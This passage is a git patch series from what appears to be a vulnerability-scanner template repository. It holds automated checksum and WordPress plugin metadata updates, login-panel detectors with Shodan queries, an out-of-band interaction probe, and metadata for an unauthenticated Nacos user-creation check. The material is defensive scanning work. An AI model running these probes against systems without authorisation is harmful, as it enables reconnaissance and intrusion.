ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:01d616c38ab902d301fa213068c48abecde0574a +templates-checksum.txt:29bdd1e06c2dea3e6c615f1a6046348fb42b779c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From bdbb2965e24c24309997ec293036e1662746eb93 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 15:55:15 +0000 Subject: [PATCH 0079/1090] TemplateMan Update [Fri Sep 1 15:55:15 UTC 2023] :robot: --- http/misconfiguration/nacos/nacos-create-user.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index b51c4aa107..8db1c05991 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml metadata: - max-request: 1 - verified: true + max-request: 3 shodan-query: title:"Nacos" + verified: true tags: nacos,unauth,bypass,instrusive http: From 07a15cb54b516357d7b862fc1c6ec6ad9aaec415 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andr=C3=A9=20Luna?= Date: Fri, 1 Sep 2023 12:57:29 -0300 Subject: [PATCH 0080/1090] Added symantec-phishing-readiness-platformn Template --- .../symantec-phishing-readiness-platform.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml diff --git a/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml b/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml new file mode 100644 index 0000000000..ce486eeff5 --- /dev/null +++ b/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml @@ -0,0 +1,40 @@ +id: symantec-phishing-readiness-platform + +info: + name: Symantec Phishing Readiness Platform Console + author: andreluna + severity: info + description: Management Console for Symantec Phishing Readiness Platform + reference: + - https://www.broadcom.com/products/cybersecurity/email/phishing-readiness + tags: symantec,panel,login + metadata: + max-request: 1 + shodan-query: http.title:"Symantec Phishing Readiness Platform" + +self-contained: true +variables: + company: "{{company}}" + +http: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{company}}.securitytraining.io + + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Phishing Readiness Platform" + part: body + + - type: status + status: + - 200 + + extractors: + - type: dsl + dsl: + - company From a89a0fd90cd291dfab022dbb36e58f31cb03aeb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 15:59:55 +0000 Subject: [PATCH 0081/1090] Auto Generated New Template Addition List [Fri Sep 1 15:59:55 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 46c92a8fef..e28a2e5837 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cnvd/2021/CNVD-2021-32799.yaml http/cves/2016/CVE-2016-10108.yaml http/cves/2018/CVE-2018-15917.yaml +http/cves/2018/CVE-2018-17153.yaml http/cves/2020/CVE-2020-10220.yaml http/cves/2020/CVE-2020-11798.yaml http/cves/2021/CVE-2021-46107.yaml From 4d1a76647967649e27c012aedbc55e959013e02b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 16:00:03 +0000 Subject: [PATCH 0082/1090] Auto Generated Templates Checksum [Fri Sep 1 16:00:03 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index edc03c9c98..6c0943a13f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1139,6 +1139,7 @@ http/cves/2018/CVE-2018-16761.yaml:81d682abe72f7d5fd5a01f06c8e99b50a1415209 http/cves/2018/CVE-2018-16763.yaml:943c0e5c9cfc765e29c1effe383a7854ec1fe6a5 http/cves/2018/CVE-2018-16836.yaml:da5026389f7ce6e91a19c9eac762ee4b6e45a6ce http/cves/2018/CVE-2018-16979.yaml:4b136214702a175b5d36385d529fb3f43bc5bd65 +http/cves/2018/CVE-2018-17153.yaml:e199ab39ec71cc03f2e14301499fc965090b7e30 http/cves/2018/CVE-2018-17246.yaml:da81e8946ecda0dd100ac2ee9438d0bee18e837f http/cves/2018/CVE-2018-17254.yaml:8b594ee917e807b882251e34f77b218deb879948 http/cves/2018/CVE-2018-17422.yaml:5b9f7c0d6f5bb5cd6bab9b21c95845739236ae22 @@ -4549,7 +4550,7 @@ http/misconfiguration/moleculer-microservices.yaml:504cfc24010ed454d66e014e62e28 http/misconfiguration/mongodb-exporter-metrics.yaml:d98f2aede304f7462730fd61743fc0dff017aa5f http/misconfiguration/multilaser-pro-setup.yaml:ee5a7afe337aa891ced4039755cb587246e67057 http/misconfiguration/mysqld-exporter-metrics.yaml:c4eeb835f1751609aca35011a762faa1a2fa39f2 -http/misconfiguration/nacos/nacos-create-user.yaml:ee86ccd52e51bf7181f3f95815466823e611c988 +http/misconfiguration/nacos/nacos-create-user.yaml:15597ae445612eec7c9b5e091e3d7169d9e5de86 http/misconfiguration/nacos-authentication-bypass.yaml:0563da3bf8c47700170d9bbf77effe33b7602092 http/misconfiguration/namedprocess-exporter-metrics.yaml:0c7cf7b10c1b8aba887b58872878a69b22598f5c http/misconfiguration/nextcloud-install.yaml:979b190886782e690c584789c104dd1ad716be5c @@ -7034,7 +7035,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:29bdd1e06c2dea3e6c615f1a6046348fb42b779c +templates-checksum.txt:f76d7dc6599164c140ccee7c420b4d3b7c38ff31 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ec78df2b5932ec09b3f30314adc290d4d6050cd9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 21:30:18 +0530 Subject: [PATCH 0083/1090] Update jorani-panel.yaml --- http/exposed-panels/jorani-panel.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index a52feb4e58..96d0fdc230 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -18,14 +18,20 @@ info: http: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/index.php/session/login' + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - "Login - Jorani" + - "name=\"csrf_test_jorani" + condition: or - type: status status: From dae133427d655afbe00944b0b80e2882d5bf7fc9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 16:07:14 +0000 Subject: [PATCH 0084/1090] Auto Generated New Template Addition List [Fri Sep 1 16:07:14 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e28a2e5837..a58674b28a 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml +http/exposed-panels/jorani-panel.yaml http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml From fd9c0736059e504c3e2ee3b9cde7c3e41a689881 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 16:07:22 +0000 Subject: [PATCH 0085/1090] Auto Generated Templates Checksum [Fri Sep 1 16:07:22 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6c0943a13f..9ba60e3f08 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3187,6 +3187,7 @@ http/exposed-panels/jenkins-login.yaml:5fe9ccde25e847ee2336291432548205458417b2 http/exposed-panels/jfrog-login.yaml:542094b95089031463b95a9c6d58a4828c2b014f http/exposed-panels/joget/joget-panel.yaml:bc5002eeb0525010057cad799870d4db802b5e02 http/exposed-panels/joomla-panel.yaml:42b9572c3f90c040698bd7cc18d3776d6d6f2fff +http/exposed-panels/jorani-panel.yaml:9422c56776d5d3173fe35807c1cd9f2d249246a0 http/exposed-panels/jsherp-boot-panel.yaml:579e04ca2c497e3f1fbed58cc4a17376455a354f http/exposed-panels/jumpserver-panel.yaml:3a6580f5108db46ec3a36d756168706c8e70d586 http/exposed-panels/jupyter-notebook.yaml:e5647cad0cfefd5b693cb61473101b42da953dfc @@ -7035,7 +7036,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:f76d7dc6599164c140ccee7c420b4d3b7c38ff31 +templates-checksum.txt:272c1a440729834144e60562cb0ccd0100a62050 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3878eca031960583a4e4749e45ea441d74309f5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 16:08:50 +0000 Subject: [PATCH 0086/1090] TemplateMan Update [Fri Sep 1 16:08:50 UTC 2023] :robot: --- http/exposed-panels/jorani-panel.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index 96d0fdc230..21b58afd90 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -7,12 +7,11 @@ info: description: Jorani login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 1 - verified: true + max-request: 2 shodan-query: html:"Login - Jorani" + verified: true tags: panel,jorani,login http: From 8154f2aa111a8876fe92f4fb4ef108c0c6cea371 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andr=C3=A9?= <2491448+andreluna@users.noreply.github.com> Date: Fri, 1 Sep 2023 17:32:55 +0000 Subject: [PATCH 0087/1090] Update external-service-interaction.yaml Bug fix. --- http/miscellaneous/external-service-interaction.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 8f25c6d01e..2dbe4d1891 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -23,9 +23,9 @@ http: Host: "{{interactsh-url}}" matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or From 3dabb68cd2f0c7d9c24407bf78ef3a9bc9b23bd2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 2 Sep 2023 04:02:21 +0000 Subject: [PATCH 0088/1090] Auto WordPress Plugins Update [Sat Sep 2 04:02:21 UTC 2023] :robot: --- helpers/wordpress/plugins/gdpr-cookie-compliance.txt | 2 +- helpers/wordpress/plugins/loco-translate.txt | 2 +- helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 203 files changed, 3 insertions(+), 203 deletions(-) diff --git a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt index eabbb4e8a1..4db08b90fe 100644 --- a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt +++ b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt @@ -1 +1 @@ -4.12.6 \ No newline at end of file +4.12.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index 68167133b9..952f449f1f 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.5 \ No newline at end of file +2.6.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt index 41c25a1861..0c66a4898e 100644 --- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -1 +1 @@ -10.5 \ No newline at end of file +10.6 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 